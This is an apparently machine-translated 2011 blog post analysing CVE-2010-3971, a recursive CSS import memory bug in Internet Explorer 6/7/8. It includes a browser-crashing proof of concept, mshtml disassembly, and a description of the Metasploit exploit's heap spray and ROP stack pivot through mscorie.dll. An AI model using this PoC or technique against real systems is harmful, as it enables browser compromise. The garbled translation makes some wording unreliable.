Site menu
Login form
Our poll
Rate my site
Результаты | Архив опросов
Всего ответов: 8
Site friends
  • Create a free website
    • Statistics
    Онлайн всего: 1
    Гостей: 1
    Пользователей: 0
    Main » 2011 » Март » 16 » Error in the recursive processing in the css ie 6/7/8 (cve20103971)
    14:04
    Error in the recursive processing in the css ie 6/7/8 (cve20103971)
    Not so long ago, or rather the beginning of December was the disclosure of a bug in the recursive processing of CSS in different versions of IE. Presented PoC could just drop a browser, but to survive from it of something more meaningful unable to start this week, while in Metasploit does not appear to exploit full exploitation of this vulnerability.

    PoC originally looked like:
    <code>
    <div style="position: absolute; top: -999px;left: -999px;">
    < link href = "css.css" rel = "stylesheet" type = "text / css" />
    </ code>

    <code of css.css>
    * {
    color: red;
    }
    @ import url ("css.css");
    @ import url ("css.css");
    @ import url ("css.css");
    @ import url ("css.css");
    </ code>

    error is damaged memory in the parser of HTML pages (mshtml.dll) in the processing of pages containing recursive include CSS object CStyleSheet:: Notify removed and later this memory area can be used to transfer control to arbitrary code.

    Mshtml! CSharedStyleSheet:: Notify:
    3ced63a5 8bff mov edi, edi
    3ced63a7 55 push ebp
    3ced63a8 8bec mov ebp, esp
    3ced63aa 51 push ecx
    3ced63ab 56 push esi
    3ced63ac 8bb1d0000000 mov esi, dword ptr [ecx +0 D0h]; esi = 0x14
    3ced63b2 57 push edi
    3ced63b3 8bb9d8000000 mov edi, dword ptr [ecx +0 D8h]; pointer to array of CStyleSheet objects
    3ced63b9 33c0 xor eax, eax
    3ced63bb c1ee02 shr esi, 2; esi = 0x5

    In principle, this vulnerability is nothing particularly interesting, but here is the realization of its operation from ryabyat of Metasploit is really worthy of attention. It is interesting that in addition to the standard heap-spray, used machinery ROP (return oriented programming) through. NET, which is not typical enough. A more accurate to use the features of the downloads mscorie.dll. NET Framework 2.0, which was compiled without the flag and always gets loaded on the same base address (0h63f00000). This omission on the part of developers can use techniques ROP to call system functions from the shellcode.

    Example stack pivot gadget for ROP:
    mscorie! _chkstk +0 X1b:
    63f0575b 94 xchg eax, esp
    63f0575c 8b00 mov eax, dword ptr [eax]
    63f0575e 890424 mov dword ptr [esp], eax
    63f05761 c3 ret

    Microsoft has released Security Advisory 2,488,013 yesterday on the subject and the vulnerability seems to be closed in the following pack updates. While citizens from MS recommend the use of EMET (The Enhanced Mitigation Experience Toolkit) to counter bypass ASLR through the above described ROP vector.
    Views: 1160 | Added by: w1zard | Rating: 0.0/0
    Total comments: 0
    Имя *:
    Email *:
    Код *: